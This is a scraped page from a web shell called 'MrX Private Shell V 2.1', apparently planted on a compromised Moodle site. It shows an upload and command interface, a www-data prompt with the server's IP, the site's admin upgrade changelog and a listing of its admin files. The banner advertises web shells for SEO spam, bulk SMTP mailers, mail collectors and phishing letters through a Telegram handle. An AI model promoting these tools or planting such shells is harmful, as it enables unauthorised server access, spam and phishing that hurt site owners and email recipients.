__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.153: ~ $
=== 4.5 Onwards ===

This file has been replaced by UPGRADING.md. See MDL-81125 for further information.

===
This files describes API changes in /admin/*.

=== 4.4 ===

* Grade item setting "Advanced grade item options" (grade_item_advanced) is no longer used and has been removed.
* Grade category settings no longer have the "Advanced" checkbox. The 'advanced' parameter has been removed.

=== 4.3 ===

* Removed admin setting cookiehttponly Moodle now defaults to HTTP only cookies for new installs only.
  Existing sites will not be affected by this change. The setting can be changed in config.php if required.
  To enable for upgraded sites set: $CFG->cookiehttponly = true;
  To disable for new sites set: $CFG->cookiehttponly = false;

  Existing cookies will not be affected by this change, until they are expired or deleted.

* Theme setting "Enable device detection" (enabledevicedetection) and related to it has been removed.
* Theme setting "Device detection regular expressions" (devicedetectregex) and related to it has been removed.
* Class adminpresets_admin_setting_devicedetectregex has been deprecated.
* The admin_setting_devicedetectregex class has been deprecated.

=== 4.2 ===

* A new admin setting coursecreationguide allows admins to configure the URL of the Quickstart guide for admins and managers.

=== 4.1 ===

* A new admin setting supportavailability allows admins to configure who the "contact site support" feature is available to
  (everyone, authenticated users, or nobody).
  -For new sites and those upgrading from 3.11.x or older, the default will be "Limited to authenticated users".
  -For sites upgrading from 4.0.x, the default will be "available to anyone visiting the site", to main consistent behaviour through the upgrade.

=== 4.0.1 ===

* A new callback xxx_pre_enable_plugin_actions has been added in admin/modules.php. Plugins can use this callback to
  force additional actions (e.g. displaying notifications, modals, etc.) before enabling the plugin. The expected
  return value (bool) from the plugin callback method specifies whether the process of enabling the plugin should
  continue after the added actions or not.

=== 3.11 ===

* New admin setting admin_setting_encryptedpassword allows passwords in admin settings to be
  encrypted (with the new \core\encryption API) so that even the admin cannot read them.
* Web services administration has been moved from Plugins into the Server category. If you have
  Behat tests containing steps like `Given I navigate to "Plugins > Web services > ..."`, you will
  want to replace them with `Given I navigate to "Server > Web services > ..."`.

=== 3.9 ===

* The following functions, previously used (exclusively) by upgrade steps are not available anymore because of the upgrade cleanup performed for this version. See MDL-65809 for more info:
    - upgrade_fix_block_instance_configuration()
    - upgrade_theme_is_from_family()
    - upgrade_find_theme_location()
    - linkcoursesectionsupgradescriptwasrun setting
    - upgrade_block_positions()

=== 3.8 ===

* Admin setting "Open to Google" (opentogoogle) has been renamed to the more generic "Open to search engines" (opentowebcrawlers).
  This is a more accurate representation of what is being set and the config string has also been moved and updated to reflect this.

=== 3.7 ===

* Admin setting "Allow blocks to use the dock" (allowblockstodock) has been removed & stings deprecated.
  Docking of blocks is no longer supported within the core themes (Boost, Classic).
  Please see MDL-64506 for further details.

=== 3.3 ===

* The admin settings admin_setting_configselect and admin_setting_configmultiselect now support the optgroup tag.
  Grouping of options can be created with this new tag.
  For using it, the option parameters needs the Group names as indexes:
  [
    "Spain" =>  ["madrid" => "Madrid", "barcelona" => "Barcelona"],
    "France" => ["paris" => "Paris", "marseille" => "Marseille"],
  ]

=== 3.2 ===

* Admin settings have been refined to better support right-to-left languages. In RTL,
  most fields should not have their direction flipped, a URL, a path to a file, ...
  are always displayed LTR. The admin setting will now best guess if they should be
  RTLized based on their PARAM_* type. To override that guess, use
  admin_setting::set_force_ltr(true/false).

Filemanager

Name Type Size Permission Actions
amd Folder 0755
classes Folder 0755
cli Folder 0755
course Folder 0755
mnet Folder 0755
presets Folder 0755
registration Folder 0755
roles Folder 0755
settings Folder 0755
templates Folder 0755
tests Folder 0755
tool Folder 0755
user Folder 0755
webservice Folder 0755
UPGRADING.md File 373 B 0644
ai.php File 2.17 KB 0644
antiviruses.php File 3.57 KB 0644
auth.php File 2.61 KB 0644
blocks.php File 3.34 KB 0644
category.php File 6.33 KB 0644
communication.php File 2.13 KB 0644
contentbank.php File 2.98 KB 0644
courseformats.php File 2.79 KB 0644
cron.php File 2.82 KB 0644
customfields.php File 2.14 KB 0644
dataformats.php File 2.71 KB 0644
editors.php File 3.35 KB 0644
enrol.php File 3.93 KB 0644
environment.php File 4.2 KB 0644
environment.xml File 172.87 KB 0644
filters.php File 8.95 KB 0644
hooks.php File 1.33 KB 0644
index.php File 41.18 KB 0644
lib.php File 4.41 KB 0644
localplugins.php File 2.66 KB 0644
lock.php File 2.89 KB 0644
mailout-debugger.php File 2.19 KB 0644
media.php File 2.21 KB 0644
message.php File 4.7 KB 0644
modules.php File 2.35 KB 0644
moodlenet_oauth2_callback.php File 2.04 KB 0644
oauth2callback.php File 2.65 KB 0644
phpinfo.php File 968 B 0644
plagiarism.php File 3.18 KB 0644
plugins.php File 8.55 KB 0644
portfolio.php File 8.41 KB 0644
process_email.php File 1.72 KB 0644
purgecaches.php File 2.54 KB 0644
qbankplugins.php File 2.4 KB 0644
qbehaviours.php File 8.47 KB 0644
qtypes.php File 10.33 KB 0644
renderer.php File 96.09 KB 0644
reports.php File 4.11 KB 0644
repository.php File 16.67 KB 0644
repositoryinstance.php File 5.75 KB 0644
resetemoticons.php File 1.63 KB 0644
search.php File 3.2 KB 0644
searchareas.php File 11.03 KB 0644
searchreindex.php File 3.3 KB 0644
settings.php File 6.19 KB 0644
swaggerui.php File 2.41 KB 0644
tasklogs.php File 3.09 KB 0644
testoutgoingmailconf.php File 4.53 KB 0644
themeselector.php File 5.25 KB 0644
thirdpartylibs.php File 2.56 KB 0644
timezone.php File 1.55 KB 0644
updatesetting.php File 2.53 KB 0644
upgrade.txt File 4.26 KB 0644
upgradesettings.php File 2.48 KB 0644
user.php File 8.23 KB 0644
Filemanager